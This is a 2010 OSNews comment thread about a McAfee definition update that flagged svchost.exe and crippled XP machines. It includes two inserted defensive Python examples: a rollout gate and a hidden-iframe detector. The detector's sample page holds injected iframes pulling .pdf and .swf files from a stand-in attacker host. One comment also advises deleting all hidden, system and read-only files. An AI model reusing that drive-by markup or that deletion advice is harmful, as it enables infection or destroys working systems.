Linked by David Adams on Fri 23rd Apr 2010 15:58 UTC
Bugs & Viruses A version of the McAfee antivirus software used in the corporate and public sectors misidentified the svchost.exe file in Windows XP systems as malware, sending the affected machines into a loop of restarts. Only users of McAfee VirusScan Enterprise on Windows XP service pack 3 were affected, but the fallout was pretty severe, with hospital and police systems among those taken down.
Precaution
by Leroy on Fri 23rd Apr 2010 16:39 UTC
Leroy
Member since:
2006-07-06

I also don't run anti-virus at home. I find most anti-virus programs only slow the computer down and provide little protection. Best practices like yours make the difference.

I live in Kentucky and this story hit here Tuesday. McAfee shut down most police stations, hospitals and governments. Though honestly, I couldn't tell the difference.

Reply Score: 6

RE: Precaution
by WereCatf on Fri 23rd Apr 2010 17:04 UTC in reply to "Precaution"
WereCatf Member since:
2006-02-15

I also don't run anti-virus at home. I find most anti-virus programs only slow the computer down and provide little protection. Best practices like yours make the difference.

I have FireFox with AdBlock+, FlashBlock and NoScript addons enabled, I am careful with what I download, and I have an external firewall. Haven't had a single virus or malware infection for years now ;)

I have installed the same addons on my mother's laptop and showed her how to use them and explained a bit on good security practices, as I have always explained to all my close relatives too. None of them have had virus or malware issues for the past few years.

It's amazing how many people seem to completely lack any kind of common sense when browsing the web, taking everything there as a 150% fact, filling their details on even the most obvious scams and so on. With even just a tiny bit of explaining of good practices they could be so much safer. Unfortunately, there is no established way of easily obtaining such knowledge, even at schools they just get taught how to use Frontpage Express or how to play Quake/Farmville, and it seems most people aren't even willing to learn! I have never understood why; is it really such a bother to have to learn something useful?

Reply Score: 7

RE[2]: Precaution
by mtzmtulivu on Fri 23rd Apr 2010 17:14 UTC in reply to "RE: Precaution"
mtzmtulivu Member since:
2006-11-14


It's amazing how many people seem to completely lack any kind of common sense when browsing the web, taking everything there as a 150% fact, filling their details on even the most obvious scams and so on. With even just a tiny bit of explaining of good practices they could be so much safer. Unfortunately, there is no established way of easily obtaining such knowledge, even at schools they just get taught how to use Frontpage Express or how to play Quake/Farmville, and it seems most people aren't even willing to learn! I have never understood why; is it really such a bother to have to learn something useful?


You seem to be informed in matters of computing, but are you as informed in matters of law, medicine, history, religion, world geography, people in your community, the internal workings of your own body?

Not everybody can be expected to have the same amount of above-average knowledge in each and every field.

Reply Score: 5

RE[3]: Precaution
by WereCatf on Fri 23rd Apr 2010 17:33 UTC in reply to "RE[2]: Precaution"
WereCatf Member since:
2006-02-15

Not everybody can be expected to have the same amount of above-average knowledge in each and every field.

Where did I even claim everyone should? But obviously, when it comes to computing and the Internet everyone should have at least the slightest clue as to how to surf securely, yet people don't seem to be willing to learn. That is NOT the same thing as asking them to know the inner workings of a computer or such, you know.

Reply Score: 4

RE[4]: Precaution
by Bill Shooter of Bul on Fri 23rd Apr 2010 18:07 UTC in reply to "RE[3]: Precaution"
Bill Shooter of Bul Member since:
2006-07-14

If you try running a large company without antivirus, you are an idiot. Let's assume that you are 99.9% vigilant against all threats without antivirus. That's great! You'd need to be confronted with 1000 virus attempts in order to be infected once. Maybe you'd encounter 1 attempt a month. So it may take 83 years before you get a virus; you'll probably be ok.

Now what if there are 1,000 employees who are using the same method against viruses and they also see one virus attempt a month? They'll see 1000 viruses a month, and one of them will be infected.

You need more 9s. Antivirus is an easy, cheap way to get more 9s (that is, when it doesn't go berserk and destroy your system like McAfee).

Reply Score: 7

RE[5]: Precaution
by nt_jerkface on Fri 23rd Apr 2010 19:38 UTC in reply to "RE[4]: Precaution"
nt_jerkface Member since:
2009-08-26

No kidding, especially when there are employees that will do the exact opposite of what they are told out of spite or apathy.

Education is good but can't beat education and protection.

There has also been malware that got past adept users through system exploits. You don't want to be the company that is rolling out anti-virus software on the day of an outbreak.

Reply Score: 2

RE[5]: Precaution
by Leroy on Fri 23rd Apr 2010 20:30 UTC in reply to "RE[4]: Precaution"
Leroy Member since:
2006-07-06

I work for a small company and we do use anti-virus here. But guess what. It doesn't work against malware. I don't remember the last time anybody actually got a virus. Year 2000? Most of the time it's those "Anti-Virus malwares" you get when surfing the internet. Several times a week somebody gets a pop-up stating that their hard-drive is infected.

CTRL-ALT-DEL, close program.

Reply Score: 1

RE[5]: Precaution
by StychoKiller on Fri 23rd Apr 2010 21:54 UTC in reply to "RE[4]: Precaution"
RE[6]: Precaution
by nt_jerkface on Fri 23rd Apr 2010 23:51 UTC in reply to "RE[5]: Precaution"
nt_jerkface Member since:
2009-08-26

An Id10t? Do you have pubes yet?

Reply Score: 0

RE[6]: Precaution
by Bill Shooter of Bul on Sat 24th Apr 2010 05:38 UTC in reply to "RE[5]: Precaution"
Bill Shooter of Bul Member since:
2006-07-14

Yes. But if you use antivirus to keep you safer, you then correctly understand that security is about risks and trade-offs rather than absolutes.

But, yes, I am talking about what to do to improve security on Windows. What do I recommend to people like me? --Fedora.

Reply Score: 2

RE[3]: Precaution
by merkoth on Fri 23rd Apr 2010 18:31 UTC in reply to "RE[2]: Precaution"
merkoth Member since:
2006-09-22

You seem to be informed in matters of computing, but are you as informed in matters of law, medicine, history, religion, world geography, people in your community, the internal workings of your own body?

Not everybody can be expected to have the same amount of above-average knowledge in each and every field.


That's why you don't see many geeks writing geography books or performing surgery. Most people, however, seem to think they can do computing tasks without knowing how to use a computer.

Unfortunately, no amount of automated tools can mitigate their lack of understanding nor common sense.

Reply Score: 5

RE[4]: Precaution
by ivanzinho on Fri 23rd Apr 2010 18:57 UTC in reply to "RE[3]: Precaution"
ivanzinho Member since:
2009-04-05

I think your comment synthesizes the overall situation.

Let's take a car as an example:
Everybody drives a car, people don't have to become an Engineer to drive a car, but they do have to get a minimum training in order to drive a car safely (and be allowed to drive at all).
While you can drive a car without any previous training, it'd be dangerous (at least until you get the hang of it).

So, no, people don't have to become geeks in order to use a computer and surf the web, but they should at least get some fairly basic training to do it safely.

Computers are complex things that do all sorts of stuff and are only getting more and more used in people's daily tasks, so if they want to use them to access their bank accounts and do whatever they do with their computers, knowing how to do it in a secure manner would, at minimum, make the web a little safer.

It's about time they start teaching Internet Safety in school instead of Microsoft Word how-tos.

Edited 2010-04-23 18:59 UTC

Reply Score: 3

RE[3]: Precaution - the bare minimum is missing
by jabbotts on Fri 23rd Apr 2010 19:01 UTC in reply to "RE[2]: Precaution"
jabbotts Member since:
2007-09-06

I don't think it's about everyone learning technology to the degree that WereCatf does, but to the minimum level of understanding that his mother and other relatives have. With your example, I'm not required to know biology to the degree of a doctor, but there is a bare minimum required, including how to feed myself. I don't require a lawyer's knowledge of law, but I also have a minimum knowledge needed and can't claim ignorance of the law as an excuse. My own example, often said: "you don't have to become an F-1 race car pilot, but you do have to learn to drive a car".

I'd suggest that most of the threats would be negated by people gaining a minimum amount of knowledge instead of simply knowing how many popups they have to click before getting to the porn shots.

Reply Score: 4

RE[3]: Precaution
by WorknMan on Fri 23rd Apr 2010 20:47 UTC in reply to "RE[2]: Precaution"
WorknMan Member since:
2005-11-13

Not everybody can be expected to have the same amount of above-average knowledge in each and every field.


The key word here is 'average knowledge' ... like in medicine, if you get a cut, you should at least know how to disinfect it. When it comes to computers and the Internet, most people don't even have this equivalent knowledge.

There is a big difference between knowing how to set up a firewall with custom rules and just basic stuff, like knowing not to double click on a .exe file that promises you nude pics of Megan Fox.

Reply Score: 3

RE[4]: Precaution
by Tuishimi on Sat 24th Apr 2010 07:05 UTC in reply to "RE[3]: Precaution"
Tuishimi Member since:
2005-07-06

"There is a big difference between knowing how to set up a firewall with custom rules and just basic stuff, like knowing not to double click on a .exe file that promises you nude pics of Megan Fox."

Oh crap!

Reply Score: 3

RE: Precaution
by SlackerJack on Fri 23rd Apr 2010 19:26 UTC in reply to "Precaution"
SlackerJack Member since:
2005-11-12

Someone is in for a big pay day for new OS installs after this then.

Reply Score: 2

RE: Precaution
by OSGuy on Fri 23rd Apr 2010 23:21 UTC in reply to "Precaution"
OSGuy Member since:
2006-01-01

That makes you very gullible. You can run AV software with resident protection off. This means real-time scan is disabled and will not slow down your computer.

I never used to run AV software either, but it's a bad practice. It won't hurt to right-click and scan a downloaded file, "just in case". Since real-time scan is turned off, I haven't noticed any slowdowns.

Edited 2010-04-23 23:23 UTC

Reply Score: 2

RE[2]: Precaution
by Morgan on Sat 24th Apr 2010 04:32 UTC in reply to "RE: Precaution"
Morgan Member since:
2005-06-29

If you have a fast enough system, realtime scanning really doesn't slow you down noticeably. I know I can't tell a difference at all when I'm on XP, and I've got a mediocre Core2Duo with 2GB memory and a GeForce 8400GS. Hardly a speed demon compared to current i7 systems, but more than enough for my needs.

The exception would be for gamers who want that extra three FPS for bragging rights or whatever. If that's an issue though, Avast now has a "gamer mode" that stops the realtime scanning for you when you game.

Reply Score: 2

Finally
by pabloski on Fri 23rd Apr 2010 16:40 UTC
pabloski
Member since:
2009-09-28

someone has understood that windows is a malicious virus infesting our computers ;)

Reply Score: 6

RE: Finally
by cb88 on Fri 23rd Apr 2010 20:55 UTC in reply to "Finally"
cb88 Member since:
2009-04-23

I believe it is properly named a "backdoor"

Reply Score: 1

Why?
by darknexus on Fri 23rd Apr 2010 16:44 UTC
darknexus
Member since:
2008-07-15

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.

Reply Score: 10

RE: Why?
by mtzmtulivu on Fri 23rd Apr 2010 17:07 UTC in reply to "Why?"
mtzmtulivu Member since:
2006-11-14

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.

What's the alternative? Solaris? :-)

The question to me is why were these computers configured to auto-update? Any update should first go through a process to make sure nothing breaks before being allowed to spread to all the computers in an organization.

Reply Score: 6
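The staging process the comment above asks for, as an added example (not code from OSNews, McAfee, or any poster): a definition update goes to a small canary ring first, and the fleet-wide push stays blocked while canary telemetry shows a core Windows binary being quarantined or hosts rebooting in a loop. Host names, the log line format, thresholds and the telemetry lines are all constructed for this example; the DAT number is the one named in the thread.

```python
from collections import Counter
from dataclasses import dataclass, field

# Core Windows binaries that a healthy definition update must never quarantine.
# Kept lower-case because Windows paths are case-insensitive.
PROTECTED_PATHS = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\lsass.exe",
    r"c:\windows\system32\winlogon.exe",
}

MAX_REBOOTS_PER_HOST = 1   # one reboot can be legitimate; two or more looks like a loop


@dataclass
class CanaryVerdict:
    promote: bool
    canary_hosts: int
    failed_hosts: int
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Split a constructed telemetry line '<host> <event> <detail>' into a tuple."""
    parts = line.strip().split(None, 2)
    if len(parts) < 2:
        return None
    host, event = parts[0], parts[1]
    detail = parts[2] if len(parts) == 3 else ""
    return host, event, detail


def evaluate_canary(log_lines, dat_version):
    """Decide whether definition set `dat_version` may leave the canary ring.

    Only events from hosts that have already reported the candidate DAT count;
    a host still on the previous DAT tells us nothing about the new one.
    """
    current_dat = {}          # host -> DAT version it last reported
    reboots = Counter()       # host -> unexpected reboots since the candidate DAT
    failed = set()
    reasons = []

    for line in log_lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        host, event, detail = parsed
        if event == "DAT":
            current_dat[host] = detail
            continue
        if current_dat.get(host) != dat_version:
            continue  # not running the candidate yet, so ignore this event
        if event == "QUARANTINE" and detail.lower() in PROTECTED_PATHS:
            failed.add(host)
            reasons.append(f"{host}: quarantined protected file {detail}")
        elif event == "REBOOT":
            reboots[host] += 1
            if reboots[host] == MAX_REBOOTS_PER_HOST + 1:
                failed.add(host)
                reasons.append(f"{host}: more than {MAX_REBOOTS_PER_HOST} reboot(s) "
                               f"after DAT {dat_version}")

    canaries = sum(1 for v in current_dat.values() if v == dat_version)
    # No telemetry is not a pass: the fleet-wide push stays blocked until
    # canary hosts have actually run the candidate DAT.
    promote = canaries > 0 and not failed
    if canaries == 0:
        reasons.append(f"no canary host has reported DAT {dat_version}")
    return CanaryVerdict(promote, canaries, len(failed), reasons)


# Constructed telemetry resembling what a canary ring would have sent during
# the DAT 5958 incident: one canary quarantines svchost.exe and reboot-loops.
INCIDENT_LOG = r"""
xp-canary-01 DAT 5958
xp-canary-01 SCAN clean
xp-canary-02 DAT 5958
xp-canary-02 QUARANTINE C:\WINDOWS\system32\svchost.exe
xp-canary-02 REBOOT unexpected
xp-canary-02 REBOOT unexpected
xp-canary-03 DAT 5957
xp-canary-03 REBOOT patch-tuesday
""".strip().splitlines()

# Constructed telemetry for an uneventful definition update.
QUIET_LOG = r"""
xp-canary-01 DAT 5959
xp-canary-01 SCAN clean
xp-canary-02 DAT 5959
xp-canary-02 REBOOT user-requested
xp-canary-03 DAT 5959
xp-canary-03 SCAN clean
""".strip().splitlines()


if __name__ == "__main__":
    for log, dat in ((INCIDENT_LOG, "5958"), (QUIET_LOG, "5959")):
        verdict = evaluate_canary(log, dat)
        print(f"DAT {dat}: promote={verdict.promote} "
              f"({verdict.failed_hosts}/{verdict.canary_hosts} canaries failed)")
        for reason in verdict.reasons:
            print("  -", reason)
```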

RE[2]: Why?
by Elv13 on Fri 23rd Apr 2010 17:19 UTC in reply to "RE: Why?"
Elv13 Member since:
2006-06-12

And that is why you pay for support and testing from them. The reality is, most of these corporate users don't have a proper IT department.

The best way for them would be a network anti-malware solution, blocking malware at a gateway before it is installed. Signature checks can be done on packets too, not just files... (and yes, it does slow your internet connection and your intranet, but only as much as antivirus slows your computers).

Reply Score: 2

RE[2]: Why?
by darknexus on Fri 23rd Apr 2010 18:36 UTC in reply to "RE: Why?"
darknexus Member since:
2008-07-15

Well, my original comment didn't quite come across the way I'd intended, and the edit timeout bit me. I meant to stress the "and", as in why are they running Windows *and* relying on antivirus *instead* of locking the systems down? That's what the policies and mmc are for after all and, while they can be a big pain in the ass and obscure at times, they're far more effective than any antivirus could ever be. Lock them down, then use a gateway/firewall/network-based AV solution to check traffic from the outside in. Split the subnets, so that if they do have a public access point it doesn't get anywhere near the corporate environment. Lock down the browser, forbid the user to install *anything*, and do not let any existing software automatically update. These steps would eliminate the need for per-system antivirus if they really must use Windows. If they're going to secure their Windows machines, they need to do it right.

Reply Score: 4

RE[3]: Why? - more "why"
by jabbotts on Fri 23rd Apr 2010 19:34 UTC in reply to "RE[2]: Why?"
jabbotts Member since:
2007-09-06

Which leads us to the next question: why does one need to lock down the system in the first place? Why is it not delivered with services off by default and configuration hardened? Why am I turning the majority of stuff off instead of turning on just what I need?

In terms of auto-updates, was this a program patch or something delivered through McAfee's signature updater? It seems to be a signature issue that decided svchost.exe was malicious. Antivirus is probably the one category of software that should be updating its signature files and scanning engine automatically. This puts the responsibility on McAfee for pushing a bad signature file update.

If it was something like a bad Windows update, I'd be all over the municipality asking why they don't have competent IT. For an AV data file update it's more understandable.

Reply Score: 2

RE[4]: Why? - more "why"
by WorknMan on Fri 23rd Apr 2010 20:49 UTC in reply to "RE[3]: Why? - more "why""
WorknMan Member since:
2005-11-13

Which leads us to the next question: why does one need to lock down the system in the first place? Why is it not delivered with services off by default and configuration hardened? Why am I turning the majority of stuff off instead of turning on just what I need?


They tried that with UAC on Vista, and we all know how well that was received.

Reply Score: 3

RE[5]: Why? - not UAC
by jabbotts on Fri 23rd Apr 2010 21:54 UTC in reply to "RE[4]: Why? - more "why""
jabbotts Member since:
2007-09-06

Much of that grief was third-party software not updated to function in the Vista security model. Microsoft chose to make UAC intentionally annoying in the hope that consumers would pressure third-party developers. They could have implemented it in a better way. Even so, the default config and software installs on Windows versions are "allow all, deny none", then leave it up to the consumer to make the system safe.

Reply Score: 2

RE[4]: Why? - more "why"
by Flatland_Spider on Fri 23rd Apr 2010 22:07 UTC in reply to "RE[3]: Why? - more "why""
Flatland_Spider Member since:
2006-09-01

It was a signature update that came from McAfee.

Patch Tuesday was last week, and there haven't been any more released for Windows clients.

McAfee DAT 5958 Update Issues
http://isc.sans.org/diary.html?storyid=8656

Reply Score: 1

RE[3]: Why?
by Bill Shooter of Bul on Fri 23rd Apr 2010 19:47 UTC in reply to "RE[2]: Why?"
Bill Shooter of Bul Member since:
2006-07-14

Even if everything you just said made sense, it's still wrong. Why? HIPAA requires antivirus for all the reasons you don't understand.

Reply Score: 2

RE[2]: Why?
by cb88 on Fri 23rd Apr 2010 20:56 UTC in reply to "RE: Why?"
cb88 Member since:
2009-04-23

You really think they had a competent admin... they probably can't afford one with the politicians sucking up all the money.

Reply Score: 1

RE: Why?
by BluenoseJake on Fri 23rd Apr 2010 19:57 UTC in reply to "Why?"
BluenoseJake Member since:
2005-08-11

Never mind, your other post clarified your statements nicely

Edited 2010-04-23 20:00 UTC

Reply Score: 2

RE: Why?
by Morgan on Sat 24th Apr 2010 04:41 UTC in reply to "Why?"
Morgan Member since:
2005-06-29

Take it from someone who works for law enforcement: Local government IT is a joke. The IT managers in my county honestly think that Linux itself is a virus because their MCSE instructor told them so. A few years ago they sent out a system-wide email discouraging employees from running Avast and AVG on their home computers because "free antivirus software can damage your system and cause you to become more infected". Why the hell they cared about our home systems I'll never know, as they don't allow any sort of VPN or other connections from home users to the county network.

It's gotten so bad that Criminal Investigations and Crime Scene have their own separate networks that are not allowed to be touched by County IT; they had to do that just to be able to work without being locked down by WebSense every ten minutes.

Reply Score: 3

RE: Why?
by bousozoku on Sat 24th Apr 2010 15:24 UTC in reply to "Why?"
bousozoku Member since:
2006-01-23

Why exactly are important services, like hospitals and police, running Windows and relying on Antivirus? Yet more proof that we've got idiots in charge I guess.


Hospitals generally don't create their own software and 3270 and 5250 dumb terminals are gone, so most use Windows to access the main computer.

It's not as though the Hospital Information System is running on a Windows server, but they still need proper access to the HIS.

Reply Score: 2

Not a mistake
by fretinator on Fri 23rd Apr 2010 17:25 UTC
fretinator
Member since:
2005-07-06

Most core Windows system files are malicious!

Just a joke, Happy Friday!

Reply Score: 4

...
by Hiev on Fri 23rd Apr 2010 17:46 UTC
Hiev
Member since:
2005-09-27

This is the story of a company that doesn't test its products in every scenario.

As a software developer, I can tell you it can happen to any of us.

Edited 2010-04-23 17:52 UTC

Reply Score: 3

RE: ... - in every scenario
by jabbotts on Fri 23rd Apr 2010 19:36 UTC in reply to "..."
jabbotts Member since:
2007-09-06

WindowsXP SP3 with McAfee Enterprise.

That's really not an obscure combination. I'd say it's one of six basic setups that should have been checked. Maybe there is a third factor in there that triggers the issue but that detail hasn't hit the news outlets yet it seems.

Reply Score: 2

Old News
by foldingstock on Fri 23rd Apr 2010 18:13 UTC
foldingstock
Member since:
2008-10-30

Virus scanners are notorious for false positives. It is the drawback to the 'search for what we know is bad' mentality.

I was recently at my university's computer lab working on a C++ program assignment when their Symantec scanner warned me that the program I compiled was malicious. It was a very simple program that computed and drew out a triangle based on three lengths. Nothing complex (under 400kb total) and certainly not a virus. I had named the executable based on the chapter, page, and problem I was working on. Symantec told me this was a trojan downloader and removed the executable.

False positives will always be a problem in the current antivirus market. Personally, I choose not to use antivirus and instead I simply do not install anything that does not come from a trusted source. This solution obviously won't work for everyone, though.

Reply Score: 3

which is worse: virus once or antivirus daily??
by Rugxulo on Fri 23rd Apr 2010 18:28 UTC in reply to "Old News"
Rugxulo Member since:
2007-10-09

Virus scanners are notorious for false positives.
I was recently at my university's computer lab working on a C++ program assignment when their Symantec scanner warned me that the program I compiled was malicious.


Indeed, it's very annoying to compile a program just to be told what a virus it is. (How? I wrote it!) Blame bad heuristics and overzealous AV dudes. Worse is that antivirus slows everything down badly, more so on "old" single-core P4s. It's unbearably slow; you can hardly even use the computer while it's running! Also, it's just not sensible to rescan the entire HD every single day, esp. when a big chunk is archives of old service packs or non-executable files, etc. Gah, so frustrating!

But malware attacks have been very strong and frequent lately, and I've noticed XP seems to be a common target. It's sad, really, that some people find it fun to hurt others for profit. :-(

Reply Score: 1

jabbotts Member since:
2007-09-06

In the days when it was about fun, the tricks tended to be humorous rather than harmful. Malware is big business today though, and the profit motivation is far more enticing to organized crime. It's not about deriving fun but deriving profits. There are some incredible geniuses working on the criminal side, rivaled only by the incredible geniuses working the defense side.

Reply Score: 2

nt_jerkface Member since:
2009-08-26


But malware attacks have been very strong and frequent lately, and I've noticed XP seems to be a common target. It's sad, really, that some people find it fun to hurt others for profit. :-(


I've heard more cases recently of XP users being hit with malicious code through Myspace/Facebook. Hackers don't even have to look for new exploits when there are plenty of people surfing social networking sites that have updates turned off.

Reply Score: 2

Alan.L.Graham Member since:
2008-01-10

I find nearly all antivirus programs do more harm than good. The ones that cost money are huge, bloated, useless junk.

The world's best Windows antivirus program is free from Microsoft, you can download from www.microsoft.com/security_essentials.
Security Essentials (SE) is small (yes, a Microsoft program that is small!) and as close to perfect as any antivirus program I have seen. Gee, why don't they make this a standard part of Windows 7 rather than a hidden free program that you have to find and install? Well, I would guess they don't want to hurt the big-buck anti-virus businesses like McAfee and Symantec. Wake up and use the small, simple, fast Microsoft Windows antivirus that works. Forget all of the others. As a double check, I run Malwarebytes overnight to see if Microsoft missed anything.

Remember the ONLY way to fix any Windows problem: reinstall Windows, Microsoft Security Essentials, free registry utility apps from download.com, and all of your apps. Next time you reinstall, make sure you partition your HDD into 2 partitions: C: for Windows and apps and D: for your files. Then next time you need to reinstall, quick format the C: drive and reinstall. All of your files are intact on the D: drive. No need to recover them from backup.

Every computer maker delivers to you one big whopping drive where you store your files together with the world's most popular computer virus ... Microsoft Windows. STUPID!

Store all of your stuff on the new D: drive and back up those files to your flash drive, NAS drive, and online. Microsoft gives you 25 GB for free on Skydrive. Just Google for "free online backup" and you'll see a lot.
I like humyo.com. Semi-easy to use and lots of free online disk space before they charge you.

Wouldn't it be nice to have a black net box that does all of this geek stuff for you automatically? My new start-up BlackNetBox.com (no website yet) will make a beautiful cube 3-node network computer that does everything for you (backup, virus protection, defrag, registry fixing, updates, testing, reinstalls, etc) behind the scenes silently, so you always have 3 perfect PCs working together for you. It automatically recovers from both software and hardware crashes. Hey, maybe I should call it a Mac. ;-) No, I call it the XCUBE. Stay tuned.

Reply Score: 2

WereCatf Member since:
2006-02-15

Wouldn't it be nice to have a black net box that does all of this geek stuff for you automatically? My new start-up BlackNetBox.com (no website yet) will make a beautiful cube 3-node network computer that does everything for you (backup, virus protection, defrag, registry fixing, updates, testing, reinstalls, etc) behind the scenes silently, so you always have 3 perfect PCs working together for you. It automatically recovers from both software and hardware crashes. Hey, maybe I should call it a Mac. ;-) No, I call it the XCUBE. Stay tuned.

*sniff sniff*

What's this smell..?

*sniff*

Smells like vaporware.

Reply Score: 4

Bobthearch Member since:
2006-01-27

Smells like frying SPAM.

Reply Score: 2

jabbotts Member since:
2007-09-06

Last third party testing I saw didn't put MSE too close to the top. I couldn't see if it was false positives or missed bits it had issues with. AVG, Avast and Avira all rank higher and provide free tools.

MSE is very light on resources though and not entirely ineffective. I run it on my home machine rather than fly naked. We'll see if it holds up over time.

Reply Score: 3

nt_jerkface Member since:
2009-08-26

I find nearly all antivirus programs do more harm than good. The ones that cost money are huge, bloated, useless junk.

The world's best Windows antivirus program is free from Microsoft, you can download from www.microsoft.com/security_essentials.
Security Essentials (SE)


Oh come on that is a ridiculous assertion.

Security Essentials cannot compare to something like Nod32 or Kaspersky. MSE is great for the price but does not offer the same level of protection. Try Nod32 if you want something light.

Reply Score: 2

RavinRay Member since:
2005-11-26

Remember the ONLY way to fix any Windows problem: reinstall Windows, Microsoft Security Essentials, free registry utility apps from download.com, and all of your apps.

Or if there's malware masquerading as a core Windows system file, get down and dirty and purge it manually if need be: go to a command prompt (in safe mode if necessary), do a search for all files with the hidden, system, and read-only attributes on, then delete the culprits. And if you've got Norton Commander for Windows 95 running on XP or later, it will read NTFS partitions and display hidden files all the time.
Next time you reinstall, make sure you partition your HDD into 2 partitions: C: for Windows and apps and D: for your files. Then next time you need to reinstall, quick format the C: drive and reinstall. All of your files are intact on the D: drive. No need to recover them from backup. Every computer maker delivers to you one big whopping drive where you store your files together with the world's most popular computer virus ... Microsoft Windows. STUPID!

Microsoft could have made this feature standard during Windows installation that if setup detects more than one hard drive it offers to put My Documents in the second drive, instead of users going out of their way to do this on their own after Windows is installed.

Reply Score: 1

Wreaked havok!
by hollovoid on Fri 23rd Apr 2010 18:53 UTC
hollovoid
Member since:
2005-09-21

This issue is still being tackled by our IT dept days later because it hit hundreds of computers all at once. I got out of it on mine because they keep the windows installation files on the computer so a quick terminal expand svchost.ex_ svchost.exe and copy to system32 / reboot got things up and running.

Reply Score: 2

Not as bad as Bit Defender
by steogede2 on Fri 23rd Apr 2010 22:02 UTC
steogede2
Member since:
2007-08-17

Did anyone see the 'Trojan.Fakealert.5' problem which affected Bit Defender (and related virus scanners) a month or so ago? Basically after updating the virus signatures, every system file was identified as malicious. Caused a lot of people a lot of problems. Thankfully Bit Defender is mainly used by home users.

Reply Score: 1

This wasn't a Patch
by Phloptical on Sat 24th Apr 2010 00:25 UTC
Phloptical
Member since:
2006-10-10

It was a daily definitions update.

I love how the ubergeeks say "simple, don't run an antivirus/windows". Yeah, that's great, you've obviously never worked a day in a corporate IT environment, and apparently never will.

Linux is not the answer. Fine for some servers/applications, but by and large, most IT departments want to pay for software and support. Not for the sub-contracted hordes of geekdom to descend on the datacenter when the latest *nix server product gets a corrupt filesystem.

Running an anti-malware product is necessary because the vast majority of people are either ignorant of what they're doing on a computer, or just too damn stupid to realize that facebook isn't going to send them an attachment in an email.

</end rant>

Reply Score: 3

State of AV today
by moondino on Sat 24th Apr 2010 02:44 UTC
moondino
Member since:
2010-03-27

Buffer overflow exploits via .pdf / .swf (sometimes Java applets, but less so) are the current infection points. If you have Adobe Reader and Flash installed and you aren't using Firefox + NoScript, you aren't as safe as you think you are. Adblock helps a bit. NoScript helps a lot, but even that isn't perfect if the top level domain you trust gets hacked and < iframe >'s you to a malicious .pdf file that then loads up a Zeus trojan .exe that no anti-virus can detect. (Zeus toolkits dynamically generate a different .exe and cannot be proactively detected well)

Most anti-virus software today is reactive, not proactive. Only companies investing heavily in HIPS (Host Intrusion Prevention) are going to go anywhere in the future. Instead of looking inside executables, start detecting odd < iframe >s on pages, scan .pdf and .swf files for odd tags, and prevent sudden and unwanted changes to the registry from executables coming from the browser cache unless explicitly allowed.

Congrats to OSNews choosing a content / commenting system that strips the < iframe > tag, btw. Bravo.

Reply Score: 2
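The page-level check the post above argues for, as an added example (not code from the poster or from any HIPS product): instead of inspecting executables, it parses fetched HTML and flags iframes that are concealed (tiny or hidden by inline style), noting when such a frame pulls a plugin document or comes from another host. The markup, hostnames and thresholds below are constructed for the example; a frame hidden only by a parent element's style is out of scope here.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PLUGIN_DOCUMENT_EXTS = (".pdf", ".swf", ".jar")  # carriers named in the thread
TINY_PX = 10  # a frame at or below this size shows nothing a user could want


def _px(value):
    """Turn '1' or '1px' into an int pixel count; None for '100%' or missing."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)\s*(px)?\s*$", value)
    return int(m.group(1)) if m else None


def _style_dim(style, prop):
    """Read a single property (e.g. 'width') out of an inline style string."""
    m = re.search(rf"(?:^|;)\s*{prop}\s*:\s*([^;]+)", (style or "").lower())
    return m.group(1).strip() if m else None


def _style_hides(style):
    """True if inline CSS makes the frame invisible or parks it far off-screen."""
    s = (style or "").lower().replace(" ", "")
    if "display:none" in s or "visibility:hidden" in s:
        return True
    for prop in ("left", "top"):
        m = re.search(rf"{prop}:-(\d+)px", s)
        if m and int(m.group(1)) >= 1000:
            return True
    return False


class IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> start tag."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def find_suspicious_iframes(html, page_host):
    """Return [(src, reasons)] for iframes that are concealed from the user.

    A visible off-site frame is an ordinary embed and is not reported; only
    concealed frames are, with extra reasons describing what they load.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src") or ""
        style = attrs.get("style") or ""
        reasons = []
        width = _px(attrs.get("width", _style_dim(style, "width")))
        height = _px(attrs.get("height", _style_dim(style, "height")))
        if width is not None and height is not None and min(width, height) <= TINY_PX:
            reasons.append(f"tiny frame {width}x{height}")
        if _style_hides(style):
            reasons.append("hidden by inline style")
        if not reasons:
            continue  # visible frame: an ordinary embed
        target = urlparse(src)
        if target.path.lower().endswith(PLUGIN_DOCUMENT_EXTS):
            reasons.append("loads a plugin document " + target.path.rsplit("/", 1)[-1])
        if target.hostname and target.hostname.lower() != page_host.lower():
            reasons.append(f"off-site host {target.hostname}")
        findings.append((src, reasons))
    return findings


# Constructed page: one legitimate visible embed plus two injected frames of
# the kind described above (1x1 frame to a .pdf, off-screen frame to a .swf).
SAMPLE_PAGE = """
<html><body>
<h1>Trusted site news</h1>
<iframe src="https://video.example.net/embed/42" width="560" height="315"></iframe>
<p>Story text...</p>
<iframe src="http://bad-host.example/x/doc.pdf" width="1" height="1" frameborder="0"></iframe>
<iframe src="http://bad-host.example/y/flash.swf" style="position:absolute; left:-9999px; top:-9999px"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for src, reasons in find_suspicious_iframes(SAMPLE_PAGE, "www.example.net"):
        print(src, "->", "; ".join(reasons))
```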

RE: State of AV today
by David on Sat 24th Apr 2010 03:06 UTC in reply to "State of AV today"
David Member since:
1997-10-01

We didn't choose it, we built it! :-)

And do you (or anyone else out there) know whether Chrome's sandbox would protect against the buffer overflow exploits you describe?

Reply Score: 1

RE[2]: State of AV today
by moondino on Sat 24th Apr 2010 17:38 UTC in reply to "RE: State of AV today"
moondino Member since:
2010-03-27

Well then, kudos to you guys! It's a refreshing and rare thing to see people care about sanitizing input.

I don't see Chrome's sandboxing preventing a PDF or SWF overflow from executing / accessing files, especially if the filesystem is FAT / FAT32. It all depends on how the PDF / SWF is written, and if UAC is enabled and the user is vigilant, etc.

